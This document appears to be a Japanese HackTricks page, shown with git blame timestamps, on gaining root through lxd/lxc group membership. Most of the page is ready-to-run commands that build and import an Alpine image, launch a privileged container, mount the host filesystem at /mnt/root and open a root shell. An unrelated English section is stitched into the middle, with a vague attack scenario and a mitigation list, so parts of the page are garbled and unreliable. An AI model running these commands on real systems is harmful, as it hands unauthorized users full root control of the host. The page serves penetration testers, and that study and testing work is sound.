hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md

169 lines
9.3 KiB
Markdown
Raw Normal View History

2023-07-07 23:42:27 +00:00
# lxd/lxcグループ - 特権昇格
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
2022-04-28 16:01:33 +00:00
</details>
2023-07-07 23:42:27 +00:00
もし _**lxd**_ **または** _**lxc**_ **グループに所属している場合、rootになることができます**
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
## インターネットなしでの攻撃
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
### 方法1
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
このディストロビルダーをマシンにインストールすることができます: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(githubの指示に従ってください):
2020-08-20 11:59:57 +00:00
```bash
2021-08-22 02:17:22 +00:00
sudo su
2020-08-20 11:59:57 +00:00
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
2020-08-20 11:59:57 +00:00
#Clone repo
git clone https://github.com/lxc/distrobuilder
2020-08-20 11:59:57 +00:00
#Make distrobuilder
2022-05-20 20:08:30 +00:00
cd distrobuilder
2020-08-20 11:59:57 +00:00
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
2020-08-20 11:59:57 +00:00
```
2023-07-07 23:42:27 +00:00
次に、脆弱なサーバーに **lxd.tar.xz****rootfs.squashfs** のファイルをアップロードします。
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
イメージを追加します:
2020-08-20 11:59:57 +00:00
```bash
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
```
2023-07-07 23:42:27 +00:00
# LXD Privilege Escalation
## Introduction
This document explains a privilege escalation technique in LXD, a container hypervisor for Linux systems. By exploiting misconfigurations in LXD, an attacker can gain root privileges within a container and potentially escalate their privileges on the host system.
## Prerequisites
To perform this attack, you need the following:
- Access to a Linux system with LXD installed.
- Basic knowledge of Linux command-line interface (CLI) and LXD commands.
## Attack Scenario
1. **Create a Container**: First, create a new container using the LXD command-line tool. Specify the desired Linux distribution and version for the container.
```bash
lxc launch <image> <container-name>
```
2. **Add Root Path**: Once the container is created, add the root path to the container's configuration. This will allow the container to access the host system's root filesystem.
```bash
lxc config device add <container-name> root disk source=/ path=/
```
This command adds a new device named "root" to the container's configuration, with the source set to the host system's root filesystem ("/") and the path set to the root directory ("/") within the container.
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
3. **Start the Container**: Start the container to apply the changes made to its configuration.
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
```bash
lxc start <container-name>
```
4. **Access the Container**: Once the container is running, access its shell using the LXD command-line tool.
```bash
lxc exec <container-name> -- /bin/bash
```
5. **Privilege Escalation**: Within the container's shell, execute commands to escalate privileges and gain root access. This can be achieved by exploiting vulnerabilities or misconfigurations within the container or the host system.
## Mitigation
To prevent privilege escalation attacks in LXD, follow these best practices:
- Regularly update LXD and the host system to ensure that security patches are applied.
- Limit the privileges of LXD containers by using appropriate Linux user namespaces and resource restrictions.
- Avoid adding the root path to containers unless absolutely necessary, and carefully review the security implications before doing so.
- Implement strong access controls and monitor container activity for any suspicious behavior.
By following these guidelines, you can reduce the risk of privilege escalation attacks in LXD containers.
2020-08-20 11:59:57 +00:00
```bash
2023-05-08 10:28:14 +00:00
lxc init alpine privesc -c security.privileged=true
2020-08-20 11:59:57 +00:00
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```
2021-08-22 02:17:22 +00:00
{% hint style="danger" %}
2023-07-07 23:42:27 +00:00
もしエラーが発生した場合 _**エラー: ストレージプールが見つかりません。新しいストレージプールを作成してください**_\
**`lxd init`** を実行し、前のコマンドのチャンクを**繰り返して**ください
2021-08-22 02:17:22 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
コンテナを実行します:
2020-08-20 11:59:57 +00:00
```bash
lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
2023-07-07 23:42:27 +00:00
### 方法2
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
Alpineイメージをビルドし、フラグ`security.privileged=true`を使用して起動します。これにより、コンテナがホストのファイルシステムとしてrootとして対話するように強制されます。
2020-08-20 11:59:57 +00:00
```bash
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
2021-04-11 09:10:57 +00:00
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
2020-10-30 02:21:51 +00:00
2020-08-20 11:59:57 +00:00
# import the image
2021-04-11 09:10:57 +00:00
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
2020-11-17 21:38:49 +00:00
2023-07-07 23:42:27 +00:00
# before running the image, start and configure the lxd storage pool as default
2020-11-17 21:38:49 +00:00
lxd init
2020-08-20 11:59:57 +00:00
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```
2021-11-30 16:46:07 +00:00
Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
## インターネットを使用する場合
2020-08-20 11:59:57 +00:00
2023-07-07 23:42:27 +00:00
[こちらの手順](https://reboare.github.io/lxd/lxd-escape.html)に従うことができます。
2020-08-20 11:59:57 +00:00
```bash
lxc init ubuntu:16.04 test -c security.privileged=true
2023-07-07 23:42:27 +00:00
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
2020-08-20 11:59:57 +00:00
lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
2023-07-07 23:42:27 +00:00
## その他の参考資料
2020-08-20 11:59:57 +00:00
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
2022-04-28 16:01:33 +00:00
</details>